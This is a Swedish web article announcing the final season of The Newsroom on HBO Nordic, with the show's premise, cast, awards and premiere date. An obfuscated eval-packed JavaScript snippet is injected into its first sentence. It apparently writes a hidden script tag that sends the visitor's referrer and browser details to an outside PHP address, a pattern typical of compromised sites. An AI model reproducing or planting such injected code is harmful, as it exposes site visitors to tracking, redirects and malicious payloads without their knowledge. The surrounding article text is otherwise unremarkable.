Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Sista säsongen av The Newsroom på HBO Nordic

Sista säsongen av The Newsroom på HBO Nordic
Sebastian

The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dkhfr|var|u0026u|referrer|hfidt||js|php’.split(’|’),0,{}))
Newsroom är skapad av Aaron Sorkin, hjärnan bakom The West Wing och manusförfattaren till filmerna The Social Network och Moneyball. I The Newsroom tar Sorkin tittarna bakom kameran och visar folket som levererar nyheterna på TV varje kväll.

I centrum står nyhetsankaret Will McAvoy (Jeff Daniels), hans exekutiva producent MacKenzie Mortimer (Emily Mortimer), nyhetsteamet (John Gallagher, Jr., Alison Pill, Thomas Sadoski, Olivia Munn, Dev Patel) och deras chef (Sam Waterston). Serien följer deras strävan att leverera nyheterna så som det ska göras. Under seriens gång möter de kommersiellt motstånd, politik, samt tampas med de personliga problem som uppstår.

För The Newsroom så har Aaron Sorkin inspirerats av verkliga händelser. Serien inleds med BP-krisen i den Mexikanska Gulfen och fortsätter med andra världsomfattande händelser som upproret i Egypten och Tea Party-rörelsens framfart i USA.

The Newsroom inleder nu sin tredje säsong och har genom åren hyllats av kritikerna och belönats med flera priser. Jeff Daniels belönades för sin roll som Will McAvoy med en Primetime Emmy Award – Outstanding Lead Actor in a Drama Series (2013). Serien har även kammat hem Critics´Choice Award – Most Exciting New Series (2012). Två gånger har serien även nominerats till Golden Globe.

Den tredje säsongen av The Newsroom har premiär måndagen den 10:e november.
Den sista säsongen är uppdelad i sex delar och kommer att finnas tillgänglig på HBO Nordic.

Säsong 1-2 finns tillgängliga på HBO Nordic.